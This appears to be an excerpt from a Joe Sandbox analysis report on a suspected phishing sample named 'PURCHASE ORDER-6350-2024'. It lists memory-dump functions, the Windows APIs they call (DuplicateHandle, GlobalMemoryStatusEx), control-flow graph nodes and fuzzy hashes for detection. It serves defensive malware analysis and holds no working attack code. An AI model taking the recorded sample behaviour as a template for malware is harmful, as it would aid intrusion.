                                                  • Instruction Fuzzy Hash: 2C419C76A002499FCB00CFA9D844ADEBFF5EF48324F28805AE914E7265C7399951DFA0
                                                  Function 0136B708 Relevance: 1.6, APIs: 1, Instructions: 66COMMON
                                                  Download Yara Rule

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 1213 136b708-136b70a 1214 136b711-136b714 1213->1214 1215 136b70c-136b70e 1213->1215 1216 136b715-136b7a4 DuplicateHandle 1214->1216 1215->1216 1217 136b710 1215->1217 1218 136b7a6-136b7ac 1216->1218 1219 136b7ad-136b7ca 1216->1219 1217->1214 1218->1219
                                                  APIs
                                                  • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?,?,?,?,0136B6D6,?,?,?,?,?), ref: 0136B797
                                                  Memory Dump Source
                                                  • Source File: 00000006.00000002.3265773483.0000000001360000.00000040.00000800.00020000.00000000.sdmp, Offset: 01360000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_6_2_1360000_PURCHASE ORDER-6350-2024.jbxd
                                                  Similarity
                                                  • API ID: DuplicateHandle
                                                  • String ID:
                                                  • API String ID: 3793708945-0
                                                  • Opcode ID: b34b70906160346834aa338766144cd0a2873a5ac6e8ba5b204e7fe511b4c1b4
                                                  • Instruction ID: 647dddd5897dfc7276c15a8b5de14a3c5f42d7ac91c4858d278e58cab92a83c5
                                                  • Opcode Fuzzy Hash: b34b70906160346834aa338766144cd0a2873a5ac6e8ba5b204e7fe511b4c1b4
                                                  • Instruction Fuzzy Hash: F821C3B59002489FDB10CF9AD984ADEFFF8FB48314F14841AE914A7214D378A944CFA4
                                                  Function 0136B27C Relevance: 1.6, APIs: 1, Instructions: 65COMMON
                                                  Download Yara Rule

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 1222 136b27c-136b7a4 DuplicateHandle 1226 136b7a6-136b7ac 1222->1226 1227 136b7ad-136b7ca 1222->1227 1226->1227
                                                  APIs
                                                  • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?,?,?,?,0136B6D6,?,?,?,?,?), ref: 0136B797
                                                  Memory Dump Source
                                                  • Source File: 00000006.00000002.3265773483.0000000001360000.00000040.00000800.00020000.00000000.sdmp, Offset: 01360000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_6_2_1360000_PURCHASE ORDER-6350-2024.jbxd
                                                  Similarity
                                                  • API ID: DuplicateHandle
                                                  • String ID:
                                                  • API String ID: 3793708945-0
                                                  • Opcode ID: dadfff8d5d8a1e985f3ef6b7afe2631d9f87619107b7a45c5ea8deeb6c40f8ff
                                                  • Instruction ID: a4e7fcda55bb134094630832b2ff57427b02fd73ad645876c0315680cb162fe4
                                                  • Opcode Fuzzy Hash: dadfff8d5d8a1e985f3ef6b7afe2631d9f87619107b7a45c5ea8deeb6c40f8ff
                                                  • Instruction Fuzzy Hash: EA21D2B59002089FDB10CFAAD584AEEFBF8FF48310F14841AE918A7310D379A954CFA4
                                                  Function 06723B71 Relevance: 1.6, APIs: 1, Instructions: 58COMMON
                                                  Download Yara Rule

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 1230 6723b71-6723b76 1231 6723b78-6723b7d 1230->1231 1232 6723b7e-6723bb6 1230->1232 1231->1232 1233 6723bbe-6723bec GlobalMemoryStatusEx 1232->1233 1234 6723bf5-6723c1d 1233->1234 1235 6723bee-6723bf4 1233->1235 1235->1234
                                                  APIs
                                                  • GlobalMemoryStatusEx.KERNELBASE ref: 06723BDF
                                                  Memory Dump Source
                                                  • Source File: 00000006.00000002.3271154942.0000000006720000.00000040.00000800.00020000.00000000.sdmp, Offset: 06720000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_6_2_6720000_PURCHASE ORDER-6350-2024.jbxd
                                                  Similarity
                                                  • API ID: GlobalMemoryStatus
                                                  • String ID:
                                                  • API String ID: 1890195054-0
                                                  • Opcode ID: 4ad858c446490146598dd8012c84dac5703deee0fc4c2acb4c802339d003c9e2
                                                  • Instruction ID: 88124e1e8f01f01c060b3a37674949eb368042a29efe4bb732ea37a077302997
                                                  • Opcode Fuzzy Hash: 4ad858c446490146598dd8012c84dac5703deee0fc4c2acb4c802339d003c9e2
                                                  • Instruction Fuzzy Hash: CD1103B1C0066A9BCB10DF9AC545ADEFBB4FF49720F10816AE818A7241D778A945CFE1
                                                  Function 06723B78 Relevance: 1.6, APIs: 1, Instructions: 52COMMON
                                                  Download Yara Rule

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 1238 6723b78-6723bec GlobalMemoryStatusEx 1241 6723bf5-6723c1d 1238->1241 1242 6723bee-6723bf4 1238->1242 1242->1241
                                                  APIs
                                                  • GlobalMemoryStatusEx.KERNELBASE ref: 06723BDF
                                                  Memory Dump Source
                                                  • Source File: 00000006.00000002.3271154942.0000000006720000.00000040.00000800.00020000.00000000.sdmp, Offset: 06720000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_6_2_6720000_PURCHASE ORDER-6350-2024.jbxd
                                                  Similarity
                                                  • API ID: GlobalMemoryStatus
                                                  • String ID:
                                                  • API String ID: 1890195054-0
                                                  • Opcode ID: 74268a0064bb785b15da9f27cfea99582e5bb38f6432a2bc968980fd113ab17e
                                                  • Instruction ID: 6ccdded1e0de4343d84934eb3b8e507bd43d5ec9e5d6b182c975f752fa78d8b4
                                                  • Opcode Fuzzy Hash: 74268a0064bb785b15da9f27cfea99582e5bb38f6432a2bc968980fd113ab17e
                                                  • Instruction Fuzzy Hash: 3411E2B1C0065A9BCB10DF9AC545B9EFBF4BF48320F14816AD818A7240D778A944CFE5
                                                  Function 0122D01C Relevance: .1, Instructions: 72COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000006.00000002.3265382173.000000000122D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0122D000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_6_2_122d000_PURCHASE ORDER-6350-2024.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 9b8f7b3319e671f2118b59ae05599b2978653659e109bfbe1e48868b77006323
                                                  • Instruction ID: f65900ffa012ead2c44519086f68444c54cf2b84a13b55f56d530c304e95b16f
                                                  • Opcode Fuzzy Hash: 9b8f7b3319e671f2118b59ae05599b2978653659e109bfbe1e48868b77006323
                                                  • Instruction Fuzzy Hash: 8A212571514248EFCB15DF68D580B1ABF65FB84314F20C56DD9090B266C37ED507CA61
                                                  Function 0122D006 Relevance: .1, Instructions: 63COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000006.00000002.3265382173.000000000122D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0122D000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_6_2_122d000_PURCHASE ORDER-6350-2024.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 634656832cced321f66d54f91227026c972f8a55d6c1da0ead7620cc0e8bb7e8
                                                  • Instruction ID: 148fea84590cec5db3c01f46ce93b52a48ad4538cf0bd90b006d8bbb01f5e6c1
                                                  • Opcode Fuzzy Hash: 634656832cced321f66d54f91227026c972f8a55d6c1da0ead7620cc0e8bb7e8
                                                  • Instruction Fuzzy Hash: E32180755083849FCB03CF64D994715BF71EB46314F28C5DAD9898F2A7C33A981ACB62
                                                  Function 00F0D628 Relevance: .0, Instructions: 36COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000006.00000002.3264684345.0000000000F0D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F0D000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_6_2_f0d000_PURCHASE ORDER-6350-2024.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: a3c83e1a7afec8ab0ed3c62ca1ceb996644e1011f577167df9e83e35380a372a
                                                  • Instruction ID: 08c7887fb1cc7c5c33483731555acbeb4b0e79222049f94d6d5c622aeccccd11
                                                  • Opcode Fuzzy Hash: a3c83e1a7afec8ab0ed3c62ca1ceb996644e1011f577167df9e83e35380a372a
                                                  • Instruction Fuzzy Hash: E2F062714043449AE7208A56D884B62FFA8EF55734F18C55AED4C4A296C37A9844DAB1